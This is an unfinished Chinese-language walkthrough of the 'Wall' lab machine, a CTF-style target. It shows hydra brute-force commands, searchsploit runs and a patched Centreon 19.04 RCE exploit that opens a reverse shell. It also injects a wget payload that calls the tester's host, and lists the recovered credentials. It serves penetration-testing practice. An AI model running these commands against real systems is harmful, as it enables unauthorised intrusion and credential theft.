Wall-rce与绕过waf(上)

参考资料:

最近太忙了ORZ,这篇没做完…

enumeration

22,80

Apache/2.4.29 (Ubuntu) Server


说明用户名可能是admin

1
2
3
4
5
6
cd /usr/share/wordlists
 hydra -l admin -P rockyou.txt -s 80 -f 10.10.10.157 http-get /monitoring

 hydra -l admin -P 3000-pass.txt -s 80 -f 10.10.10.157 http-get /monitoring
 hydra -l panel -P rockyou.txt -s 80 -f 10.10.10.157 http-get /monitoring
 hydra -l aa -P rockyou.txt -s 80 -f 10.10.10.157 http-get /monitoring

ssh

OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

searchsploit -m exploits/linux/remote/45233.py
python 45233.py(type error代码错误)

searchsploit -m exploits/linux/remote/45210.py
python 45210.py (TypeError)

searchsploit -m exploits/linux/remote/45939.py
python 45939.py –port 22 10.10.10.157 root(TypeError: an integer is required)

hydra -l admin -P rockyou.txt 10.10.10.157 ssh

web

enumeration

dirb http://10.10.10.157 -X .php
存在的目录
http://10.10.10.157/aa.php
http://10.10.10.157/monitoring/
http://10.10.10.157/panel.php
http://10.10.10.157/centreon

nikto -h http://10.10.10.157
GET, POST, OPTIONS, HEAD

未发现目录遍历

10.10.10.157/monitoring/../panel.php

跳转到panel.php

10.10.10.157/monitoring/../../../../../../../../../etc/passwd
无效

get改post请求,绕过登陆页面。

searchsploit centreon

searchsploit -m exploitdb/exploits/php/webapps/47069.py
v. 19.04.0

exp下载地址

python3.6 47069.py http://10.10.10.157/centreon admin passwd1 10.10.14.10 1330

执行后报错,于是修改exp。

1
2
3
4
5
6
。。。。。。
  poller_soup = BeautifulSoup(poller_html)
Traceback (most recent call last):
  File "47069.py", line 57, in <module>
    poller_token = poller_soup.findAll('input')[24].get("value")
IndexError: list index out of range

poller_token = poller_soup.find(‘input’, {‘name’: ‘centreon_token’}).get(‘value’)

python3 centreon-exploit.py http://10.10.10.157/centreon admin passwd1 IP 8080

反弹shell失败

修改后,无报错的exp地址:https://github.com/Whale3070/ctf-coding/blob/master/47069.py

绕过waf

python3 47069.py http://10.10.10.157/centreon admin password1 10.10.14.18 8081

http://10.10.10.157/centreon/Themes/Centreon-2/


目录遍历漏洞

http://10.10.10.157/centreon/main.get.php?p=60901
http://10.10.10.157/centreon/include/configuration/configGenerate/xml/generateFiles.php

测试命令执行是否成功,修改payload为

1
wget http://10.10.14.10:888/1.txt #

失败

1
2
3
4
5
6
7
8
9
10
hydra -L /usr/share/wordlists/rockyou.txt  -P /usr/share/wordlists/rockyou.txt -V -s 80 

10.10.10.157 http-post-form "/centreon/index.php:useralias=^USER^&password=^PASS^&submitLogin=Connect&centreon_token=d9ab2ad282b929cf8f32486cee14da85:Your credentials are incorrect."

hydra -l centreon  -P /usr/share/wordlists/rockyou.txt -V -s 80 10.10.10.157 http-post-form "/centreon/index.php:useralias=^USER^&password=^PASS^&submitLogin=Connect&centreon_token=d9ab2ad282b929cf8f32486cee14da85:Your credentials are incorrect."

hydra -l admin  -P /usr/share/wordlists/rockyou.txt -V -s 80 10.10.10.157 http-post-form "/centreon/index.php:useralias=^USER^&password=^PASS^&submitLogin=Connect&centreon_token=d9ab2ad282b929cf8f32486cee14da85:Your credentials are incorrect." -t 4

admin/password1
centreon/#1bitch

存在的漏洞

centreon 19.04 rce
后台弱口令
apache目录遍历

根据python exp手动利用漏洞

19.04 版本漏洞
https://www.cvedetails.com/vulnerability-list/vendor_id-7565/product_id-12778/version_id-303583/Centreon-Centreon-19.04.0.html

开启burp,首先访问http://10.10.10.157/centreon/main.php?p=60901&o=c&server_id=1


注意图中的testpath

待续